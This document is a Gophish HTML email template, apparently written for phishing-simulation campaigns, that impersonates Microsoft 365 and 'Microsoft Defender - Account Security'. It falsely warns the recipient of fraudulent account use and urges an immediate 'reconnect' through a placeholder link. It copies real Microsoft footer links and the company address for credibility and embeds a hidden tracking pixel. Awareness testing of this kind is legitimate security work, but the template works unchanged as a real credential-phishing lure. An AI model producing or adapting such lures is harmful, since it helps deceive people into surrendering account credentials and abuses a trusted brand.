<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <title>Verify Your Connection to Microsoft 365</title>
    <link rel="shortcut icon" href="https://github.com/PassAndSecure/Template_Gophish/blob/4cd0bc9b249bde55e4f15e64e51bb42f11b306a6/Picture-Template/logo-micro-1.png?raw=true"/>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 20px;
            background-color: #f4f4f4;
        }
        .email-container {
            max-width: 600px;
            margin: 0 auto;
            background-color: #2c2d35;
            color:white;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }
        .email-header {
            background-color: #654AE7;
            color: #ffffff;
            padding: 20px;
            text-align: center;
            font-size: 24px;
            font-weight: bold;
        }
        .email-body {
            padding: 20px;
        }
        .email-body a {
            text-decoration: none;
        }
        .email-footer {
            margin-top: 20px;
            padding: 5px;
            font-size: 12px;
            color: #888888;
            background-color: #302F2F;
            text-align: left;
        }
        .email-footer a {
            color: #0078d4;
            text-decoration: none;
        }

    </style>
</head>
<body>
    <div class="email-container">
        <div class="email-header">
            Verify Your Connection to Microsoft 365
        </div>
        <div class="email-body">
            <p>Hello {{.FirstName}} {{.LastName}},</p>
            <p>You are the owner of the account {{.Email}}.</p>
            <p>We have received a report of fraudulent use of this account. To ensure your security, please <a href="{{.URL}}">reconnect</a> immediately.<br><br> If Microsoft Defender detects any anomalies, you will be required to change your password.</p>
            <p>Sincerely,</p>
            <p>Microsoft Defender - Account Security</p>
        </div>
        <div class="email-footer">
            <p style="margin-top: 10px; margin-left: 10px;"><a href="https://outlook.office365.com/owa/ReactionDigestMailUnsubscribe.aspx" style="color: #969696;">Unsubscribe</a> • <a href="https://go.microsoft.com/fwlink/?LinkId=512132" style="color: #969696;">Privacy Statement</a><br>
            Microsoft Corporation, One Microsoft Way, Redmond, WA 98052</p>
        </div>
    </div>
    <img src="{{.TrackingURL}}" alt="Tracker" style="display:none;">
</body>
</html>

<!------.-. .-')         (`-.    _  .-')   
        \  ( OO )      _(OO  )_ ( \( -O )  
        ,--. ,--.  ,--(_/   ,. \ ,------.  
        |  .'   /  \   \   /(__/ |   /`. ' 
        |      /,   \   \ /   /  |  /  | | 
        |     ' _)   \   '   /,  |  |_.' | 
        |  .   \      \     /__) |  .  '.' 
        |  |\   \      \   /     |  |\  \  
        `--' '--'       `-'      `--' '--'------->    
